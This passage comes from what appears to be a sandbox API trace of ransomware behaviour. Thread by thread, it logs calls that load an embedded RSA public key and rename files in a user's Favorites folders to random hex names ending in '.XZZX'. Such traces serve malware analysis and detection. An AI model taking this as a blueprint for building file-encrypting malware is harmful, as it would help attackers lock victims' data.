HALPmcxz\\Favorites\\72A6C9432269CCE1A510518B2681B129.XZZX") returned 81 [0109.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0109.899] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\317F13A43DC41A62ABAE669241E4FEAA.XZZX") returned 81 [0109.899] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 327 os_tid = 0x814 [0110.061] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.061] lstrcpyW (in: lpString1=0x420f460, lpString2="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" | out: lpString1="15DC3754190A8EA84ED7A99B1D2272F0.XZZX") returned="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" [0110.062] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0110.062] SetErrorMode (uMode=0x1) returned 0x1 [0110.062] lstrcpyW (in: lpString1=0x420f860, lpString2="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" | out: lpString1="15DC3754190A8EA84ED7A99B1D2272F0.XZZX") returned="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" [0110.062] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xf456b1b0, Data2=0xaa96, Data3=0x4e0c, Data4=([0]=0x87, [1]=0x40, [2]=0x6, [3]=0xa7, [4]=0x7e, [5]=0xdb, [6]=0x4d, [7]=0x13))) returned 0x0 [0110.062] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\15DC3754190A8EA84ED7A99B1D2272F0.XZZX") returned 87 [0110.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0110.062] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\BCCAFD203401B308F456B1B038229750.XZZX") returned 87 [0110.062] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 328 os_tid = 0x81c [0110.205] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.205] lstrcpyW (in: lpString1=0x420f460, lpString2="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" | out: lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX") returned="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" [0110.205] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0110.206] SetErrorMode (uMode=0x1) returned 0x1 [0110.206] lstrcpyW (in: lpString1=0x420f860, lpString2="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" | out: lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX") returned="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" [0110.206] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x3a658486, Data2=0x7eb, Data3=0x47cb, Data4=([0]=0xbe, [1]=0x1c, [2]=0xc9, [3]=0x7c, [4]=0x37, [5]=0xdb, [6]=0x86, [7]=0x40))) returned 0x0 [0110.206] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\8E5ECE9444DBAF1A59BC413E48F39362.XZZX") returned 87 [0110.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0110.206] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\61D05102023874593A658486065958A1.XZZX") returned 87 [0110.206] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 329 os_tid = 0x824 [0110.361] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.361] lstrcpyW (in: lpString1=0x420f460, lpString2="B8440918056E9F026EA48C8C0986834A.XZZX" | out: lpString1="B8440918056E9F026EA48C8C0986834A.XZZX") returned="B8440918056E9F026EA48C8C0986834A.XZZX" [0110.361] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0110.361] SetErrorMode (uMode=0x1) returned 0x1 [0110.361] lstrcpyW (in: lpString1=0x420f860, lpString2="B8440918056E9F026EA48C8C0986834A.XZZX" | out: lpString1="B8440918056E9F026EA48C8C0986834A.XZZX") returned="B8440918056E9F026EA48C8C0986834A.XZZX" [0110.361] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x8b5cc9d5, Data2=0xb3c2, Data3=0x4dd7, Data4=([0]=0x92, [1]=0xcf, [2]=0x19, [3]=0xa1, [4]=0x1c, [5]=0x2f, [6]=0x1c, [7]=0xe5))) returned 0x0 [0110.361] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\B8440918056E9F026EA48C8C0986834A.XZZX") returned 87 [0110.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0110.361] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\7D70E26A36A851EE8B5CC9D53AC93636.XZZX") returned 87 [0110.361] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 330 os_tid = 0x828 [0110.531] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.531] lstrcpyW (in: lpString1=0x420f460, lpString2="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" | out: lpString1="1844FE2A092A01627C9EB5E50D41E5AA.XZZX") returned="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" [0110.532] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0110.532] SetErrorMode (uMode=0x1) returned 0x1 [0110.532] lstrcpyW (in: lpString1=0x420f860, lpString2="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" | out: lpString1="1844FE2A092A01627C9EB5E50D41E5AA.XZZX") returned="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" [0110.532] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xfa174d91, Data2=0xea18, Data3=0x49fd, Data4=([0]=0xa3, [1]=0x4a, [2]=0x9, [3]=0x2b, [4]=0x25, [5]=0xef, [6]=0xd0, [7]=0xe4))) returned 0x0 [0110.532] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\1844FE2A092A01627C9EB5E50D41E5AA.XZZX") returned 100 [0110.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0110.532] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\BF15CF9843A831B8FA174D9147C91600.XZZX") returned 100 [0110.532] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 331 os_tid = 0x82c [0110.673] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.673] lstrcpyW (in: lpString1=0x420f460, lpString2="1B49B9E018F35807975DC8201D0B3C4F.XZZX" | out: lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX") returned="1B49B9E018F35807975DC8201D0B3C4F.XZZX" [0110.673] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0110.673] SetErrorMode (uMode=0x1) returned 0x1 [0110.673] lstrcpyW (in: lpString1=0x420f860, lpString2="1B49B9E018F35807975DC8201D0B3C4F.XZZX" | out: lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX") returned="1B49B9E018F35807975DC8201D0B3C4F.XZZX" [0110.673] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x594a1bf5, Data2=0x8b67, Data3=0x426c, Data4=([0]=0x89, [1]=0x7c, [2]=0x2c, [3]=0xaa, [4]=0x3, [5]=0x2d, [6]=0x78, [7]=0xba))) returned 0x0 [0110.673] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\1B49B9E018F35807975DC8201D0B3C4F.XZZX") returned 100 [0110.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0110.673] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\29FF4693242B5D74594A1BF5284C41BC.XZZX") returned 100 [0110.674] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 332 os_tid = 0x830 [0110.829] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.829] lstrcpyW (in: lpString1=0x420f460, lpString2="30FEF3B4011ABE0E503ED66C0532A256.XZZX" | out: lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX") returned="30FEF3B4011ABE0E503ED66C0532A256.XZZX" [0110.829] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0110.829] SetErrorMode (uMode=0x1) returned 0x1 [0110.829] lstrcpyW (in: lpString1=0x420f860, lpString2="30FEF3B4011ABE0E503ED66C0532A256.XZZX" | out: lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX") returned="30FEF3B4011ABE0E503ED66C0532A256.XZZX" [0110.829] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x271c1e2, Data2=0xd9a1, Data3=0x4b52, Data4=([0]=0xb6, [1]=0x72, [2]=0xdf, [3]=0x75, [4]=0xfb, [5]=0xed, [6]=0xe2, [7]=0x54))) returned 0x0 [0110.830] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\30FEF3B4011ABE0E503ED66C0532A256.XZZX") returned 100 [0110.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0110.830] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\F6E381224007E0920271C1E24428C4DA.XZZX") returned 100 [0110.830] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 333 os_tid = 0x834 [0110.985] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.985] lstrcpyW (in: lpString1=0x420f460, lpString2="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" | out: lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX") returned="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" [0110.985] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0110.985] SetErrorMode (uMode=0x1) returned 0x1 [0110.985] lstrcpyW (in: lpString1=0x420f860, lpString2="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" | out: lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX") returned="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" [0110.985] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x51792390, Data2=0xd6ea, Data3=0x4be8, Data4=([0]=0xab, [1]=0xba, [2]=0xf9, [3]=0xb2, [4]=0x35, [5]=0xf1, [6]=0xe4, [7]=0x80))) returned 0x0 [0110.985] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\B2A8C78F28F146042377D2FD2D1E2A4C.XZZX") returned 100 [0110.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0110.985] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\BC74E1A03FB952105179239043DA3658.XZZX") returned 100 [0110.985] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 334 os_tid = 0x838 [0111.141] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0111.141] lstrcpyW (in: lpString1=0x420f460, lpString2="FD9030E848C62D90344A51E94CDE11D8.XZZX" | out: lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX") returned="FD9030E848C62D90344A51E94CDE11D8.XZZX" [0111.141] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0111.141] SetErrorMode (uMode=0x1) returned 0x1 [0111.141] lstrcpyW (in: lpString1=0x420f860, lpString2="FD9030E848C62D90344A51E94CDE11D8.XZZX" | out: lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX") returned="FD9030E848C62D90344A51E94CDE11D8.XZZX" [0111.141] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x5a5e5294, Data2=0x47ff, Data3=0x452f, Data4=([0]=0x88, [1]=0x30, [2]=0xbf, [3]=0xc5, [4]=0x5, [5]=0x4b, [6]=0xe8, [7]=0xf7))) returned 0x0 [0111.141] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\FD9030E848C62D90344A51E94CDE11D8.XZZX") returned 100 [0111.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0111.141] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft 